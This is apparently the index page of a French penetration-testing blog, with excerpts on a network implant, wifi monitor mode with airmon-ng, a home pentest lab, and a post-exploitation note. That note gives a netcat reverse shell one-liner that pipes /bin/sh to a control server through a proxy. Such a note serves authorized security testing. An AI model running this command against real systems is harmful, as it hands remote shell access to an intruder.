Posted on sam. 20 février 2021 in tuto • Tagged with infosec, tuto, tools, vpn, sysadmin, pentest
Un outil courant lors d'audits d'intrusion est l'implant réseau : il s'agit d'un petit appareil que l'on va déposer chez la cible et raccorder à son réseau, et qui va nous permettre d'y accéder via une connexion distante, le tout à l'aide d'un tunnel sécurisé. S'il existe des solutions commerciales comme …
Posted on mer. 20 mai 2020 in cheatsheet • Tagged with infosec, pentest, wifi, aircrack
N'effectuez ces manipulations que sur des réseaux/machines pour lesquelles vous avez une autorisation explicite.
nmcli dev set wlan0 managed no
airmon-ng start wlan0
L'interface de monitoring est maintenant wlan0mon ou assimilé (check avec …
Posted on ven. 14 juin 2019 in post-it • Tagged with pentest, post-exploitation
Obtenir un reverse shell :
mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1 | nc -X connect -x [IP Proxy]:[Port Proxy] [IP du serveur de contrôle] [Port en écoute pour le reverse shell] > /tmp/f; rm /tmp/f …Posted on jeu. 18 octobre 2018 in vrac • Tagged with pentest, tools, virtualisation, lab
Depuis un certain temps, j'avais dans la tête l'idée de me créer un lab de pentest chez moi. Le but était d'avoir un "micro-réseau" d'entreprise (avec les éléments qu'on retrouve souvent dans une entreprise classique) pour pouvoir tester des outils et méthodes et monter en compétences sur les différentes technos …